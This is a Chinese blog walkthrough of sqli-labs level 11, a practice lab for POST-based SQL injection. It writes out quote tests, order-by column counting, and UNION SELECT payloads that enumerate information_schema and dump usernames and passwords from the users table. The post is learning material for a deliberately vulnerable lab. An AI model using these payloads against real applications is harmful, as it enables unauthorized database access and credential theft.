sqli-labs 11-17

知识点补充sql的基本查询语句

mysql

select schema_name from information_schema.schemata;
select table_name from information_schema.tables where table_schema='security';
select column_name from information_schema.columns where table_name='users';
select username,password from security.users;

less11

在这里插入图片描述提交发现url 栏没有显示 这说明使用的时没有用get传参,而是使用了post传参
在这里插入图片描述
输入admin’时报错,说明存在注入漏洞

' order by 2# //无回显
' order by 3# //报错

使用联合查询测试回显

n' union select 1,2#

在这里插入图片描述

查询发现错误

n' union select 1,2,3#

在这里插入图片描述

然后开始爆数据库

a' union select 1,database()#

在这里插入图片描述

n' union select 1, schema_name from information_schema.schemata#

在这里插入图片描述在这里插入图片描述

n' union select 1, group_concat(schema_name) from information_schema.schemata#

查所有的库名
在这里插入图片描述
查表名

n' union select 1, group_concat(table_name) from information_schema.tables where table_schema='security'#

直接翻译好了哈哈
在这里插入图片描述
select column_name from information_schema.columns where table_name=‘users’;
select username,password from security.users;
查列

n' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

在这里插入图片描述

n' union select 1, group_concat(username,password) from  security.users#

查这个用户的密码和登录名
在这里插入图片描述
一次性查询所有的数据

n' union select 1, group_concat(concat_ws(0x7e,username,password)) from  security.users#

在这里插入图片描述

less11 总结

concat_ws(’~’,A,B)**一次性查询所有的数据
**
第一关使用的是 get
第十一关使用post

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值